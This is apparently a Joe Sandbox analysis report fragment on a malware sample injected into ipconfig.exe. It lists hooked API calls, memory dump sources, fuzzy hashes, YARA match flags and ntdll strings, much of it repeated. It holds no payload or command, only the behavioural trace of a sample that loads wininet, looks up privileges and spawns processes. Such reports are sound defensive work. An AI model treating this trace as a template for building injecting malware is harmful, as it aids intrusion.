                                                                                                                                                      • Opcode Fuzzy Hash: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
                                                                                                                                                      • Instruction Fuzzy Hash: BA31E471A00319BBEB21DF60CC85FEB777DAF85745F144598BA49A7180D770EA88CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F2FB5F
                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02F2FB9E
                                                                                                                                                      • FindClose.KERNELBASE(?), ref: 02F2FBA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F33BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F33BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F3862D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(02F33D72,5E972F65,FFFFFFFF,02F33A31,?,?,02F33D72,?,02F33A31,FFFFFFFF,5E972F65,02F33D72,?,00000000), ref: 02F386D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(02F33D72,5E972F65,FFFFFFFF,02F33A31,?,?,02F33D72,?,02F33A31,FFFFFFFF,5E972F65,02F33D72,?,00000000), ref: 02F386D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(02F33D50,?,?,02F33D50,00000000,FFFFFFFF), ref: 02F38735
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(02F33D50,?,?,02F33D50,00000000,FFFFFFFF), ref: 02F38735
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02F373A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02F373A8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F23B93), ref: 02F3891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F23B93), ref: 02F3891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000,00000000,02F23AC6,00000000), ref: 02F31777
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Initialize
                                                                                                                                                      • String ID: @J7<
                                                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000,00000000,02F23AC6,00000000), ref: 02F31777
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Initialize
                                                                                                                                                      • String ID: @J7<
                                                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F272DA
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F272FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F389B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F29BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F389B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F29BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F2CCF0,?,?), ref: 02F3746C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F2CFC2,02F2CFC2,?,00000000,?,?), ref: 02F38A80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(02F33536,?,02F33CAF,02F33CAF,?,02F33536,?,?,?,?,?,00000000,00000000,?), ref: 02F388DD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F27C83,?), ref: 02F2D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F27C83,?), ref: 02F2D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      • Execute=1, xrefs: 03A8451E
                                                                                                                                                      • ExecuteOptions, xrefs: 03A844AB
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A84530
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A8454D
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A84460
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A84507
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A84592
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
